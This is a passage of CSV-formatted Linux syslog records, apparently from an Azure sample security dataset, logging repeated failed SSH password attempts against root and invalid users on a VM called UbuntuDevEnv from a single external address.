+1677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:47,UbuntuDevEnv,2019-06-28 04:50:46,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 18634 ssh2,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,18634,,
+1678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:47,UbuntuDevEnv,2019-06-28 04:50:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:48,UbuntuDevEnv,2019-06-28 04:50:48,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 18634 ssh2,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,18634,,
+1680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:49,UbuntuDevEnv,2019-06-28 04:50:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:51,UbuntuDevEnv,2019-06-28 04:50:50,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 18634 ssh2,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,18634,,
+1682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:55,UbuntuDevEnv,2019-06-28 04:50:54,auth,UbuntuDevEnv,info,"Disconnecting invalid user 1234 193.201.224.232 port 18634: Change of username or service not allowed: (1234,ssh-connection) -> (root,ssh-connection) [preauth]",87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,18634,,
+1683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:55,UbuntuDevEnv,2019-06-28 04:50:54,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:55,UbuntuDevEnv,2019-06-28 04:50:54,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:56,UbuntuDevEnv,2019-06-28 04:50:55,auth,UbuntuDevEnv,info,"Disconnecting authenticating user root 193.201.224.232 port 4361: Change of username or service not allowed: (root,ssh-connection) -> (Root,ssh-connection) [preauth]",87621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,193.201.224.2,4361,,
+1686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:56,UbuntuDevEnv,2019-06-28 04:50:56,auth,UbuntuDevEnv,info,Invalid user Root from 193.201.224.232 port 5257,87624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Root,193.201.224.2,5257,,
+1687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:57,UbuntuDevEnv,2019-06-28 04:50:56,auth,UbuntuDevEnv,info,Failed none for invalid user Root from 193.201.224.232 port 5257 ssh2,87624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Root,193.201.224.2,5257,,
+1688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:59,UbuntuDevEnv,2019-06-28 04:50:59,auth,UbuntuDevEnv,info,"Disconnecting invalid user Root 193.201.224.232 port 5257: Change of username or service not allowed: (Root,ssh-connection) -> (root,ssh-connection) [preauth]",87624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Root,193.201.224.2,5257,,
+1689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:12,UbuntuDevEnv,2019-06-28 04:52:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:15,UbuntuDevEnv,2019-06-28 04:52:14,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 34199 ssh2,87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,34199,,
+1691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:27,UbuntuDevEnv,2019-06-28 04:52:21,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 34199 ssh2],87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,34199,,
+1692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:30,UbuntuDevEnv,2019-06-28 04:52:29,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 34199 ssh2,87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,34199,,
+1693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:43,UbuntuDevEnv,2019-06-28 04:52:42,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 34199: Too many authentication failures [preauth],87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,34199,,
+1694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:43,UbuntuDevEnv,2019-06-28 04:52:42,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:43,UbuntuDevEnv,2019-06-28 04:52:42,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 34199 ssh2],87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,34199,,
+1696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:43,UbuntuDevEnv,2019-06-28 04:52:42,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 34199 ssh2 [preauth],87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,34199,,
+1697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:43,UbuntuDevEnv,2019-06-28 04:52:42,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,87823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:44,UbuntuDevEnv,2019-06-28 04:52:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:52:46,UbuntuDevEnv,2019-06-28 04:52:45,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 49521 ssh2,88006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,49521,,
+1700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:00,UbuntuDevEnv,2019-06-28 04:53:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:00,UbuntuDevEnv,2019-06-28 04:53:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 49521 ssh2 [preauth],88006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,49521,,
+1702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:00,UbuntuDevEnv,2019-06-28 04:53:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:00,UbuntuDevEnv,2019-06-28 04:53:00,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 49521: Too many authentication failures [preauth],88006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,49521,,
+1704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:00,UbuntuDevEnv,2019-06-28 04:53:00,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 193.201.224.232 port 49521 ssh2],88006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,49521,,
+1705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:21,UbuntuDevEnv,2019-06-28 04:53:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:23,UbuntuDevEnv,2019-06-28 04:53:23,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 27985 ssh2,88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,27985,,
+1707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:27,UbuntuDevEnv,2019-06-28 04:53:25,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 27985 ssh2,88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,27985,,
+1708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:28,UbuntuDevEnv,2019-06-28 04:53:28,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 27985 ssh2,88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,27985,,
+1709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:44,UbuntuDevEnv,2019-06-28 04:53:43,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:44,UbuntuDevEnv,2019-06-28 04:53:43,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 27985: Too many authentication failures [preauth],88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,27985,,
+1711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:44,UbuntuDevEnv,2019-06-28 04:53:43,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 193.201.224.232 port 27985 ssh2],88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,27985,,
+1712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:44,UbuntuDevEnv,2019-06-28 04:53:43,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:44,UbuntuDevEnv,2019-06-28 04:53:43,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 27985 ssh2 [preauth],88125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,27985,,
+1714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:48,UbuntuDevEnv,2019-06-28 04:53:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:53:49,UbuntuDevEnv,2019-06-28 04:53:48,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 15041 ssh2,88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,15041,,
+1716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:02,UbuntuDevEnv,2019-06-28 04:54:00,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 15041 ssh2],88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,15041,,
+1717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:10,UbuntuDevEnv,2019-06-28 04:54:10,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 15041 ssh2,88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,15041,,
+1718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:14,UbuntuDevEnv,2019-06-28 04:54:14,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:14,UbuntuDevEnv,2019-06-28 04:54:14,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:14,UbuntuDevEnv,2019-06-28 04:54:14,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 15041 ssh2],88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,15041,,
+1721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:14,UbuntuDevEnv,2019-06-28 04:54:14,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 15041 ssh2 [preauth],88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,15041,,
+1722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:14,UbuntuDevEnv,2019-06-28 04:54:14,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 15041: Too many authentication failures [preauth],88226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,15041,,
+1723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:17,UbuntuDevEnv,2019-06-28 04:54:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:18,UbuntuDevEnv,2019-06-28 04:54:18,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 31148 ssh2,88329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,31148,,
+1725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:27,UbuntuDevEnv,2019-06-28 04:54:26,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 193.201.224.232 port 31148 ssh2],88329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,31148,,
+1726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:28,UbuntuDevEnv,2019-06-28 04:54:28,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 31148 ssh2 [preauth],88329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,31148,,
+1727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:28,UbuntuDevEnv,2019-06-28 04:54:28,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:28,UbuntuDevEnv,2019-06-28 04:54:28,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:28,UbuntuDevEnv,2019-06-28 04:54:28,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 31148: Too many authentication failures [preauth],88329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,31148,,
+1730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:28,UbuntuDevEnv,2019-06-28 04:54:28,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 31148 ssh2,88329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,31148,,
+1731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:32,UbuntuDevEnv,2019-06-28 04:54:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:34,UbuntuDevEnv,2019-06-28 04:54:33,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 6421 ssh2,88391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6421,,
+1733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:45,UbuntuDevEnv,2019-06-28 04:54:44,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 193.201.224.232 port 6421 ssh2],88391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6421,,
+1734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:45,UbuntuDevEnv,2019-06-28 04:54:44,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 6421: Too many authentication failures [preauth],88391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,6421,,
+1735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:45,UbuntuDevEnv,2019-06-28 04:54:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
